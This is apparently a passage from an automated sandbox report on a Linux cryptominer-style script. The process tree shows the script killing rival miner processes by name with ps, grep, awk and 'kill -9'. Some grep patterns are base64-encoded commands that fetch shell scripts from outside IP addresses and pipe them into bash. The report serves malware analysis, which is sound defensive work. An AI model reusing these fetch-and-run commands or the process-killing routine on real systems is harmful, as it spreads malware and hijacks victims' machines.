-
/bin/grepgrep CnzFVPLF2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep CvKzzZLs2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /tmp/udevd2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep sustse2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep sustse32⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep mr.sh2⤵
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep mr.sh2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep 2mr.sh2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep 2mr.sh2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep cr5.sh2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep cr5.sh2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep logo9.jpg2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep logo9.jpg2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep j2.conf2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep luk-cpu2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep luk-cpu2⤵
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
- Reads runtime system information
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep ficov2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep ficov2⤵
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep he.sh2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep he.sh2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep miner.sh2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep miner.sh2⤵
-
/bin/grepgrep curl2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
-
/bin/grepgrep wget2⤵
-
/bin/grepgrep nullcrew2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep curl2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep nullcrew2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5b026324c6904b2a9cb4b88d6d61c81d1
SHA1e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA2564355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA5123abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686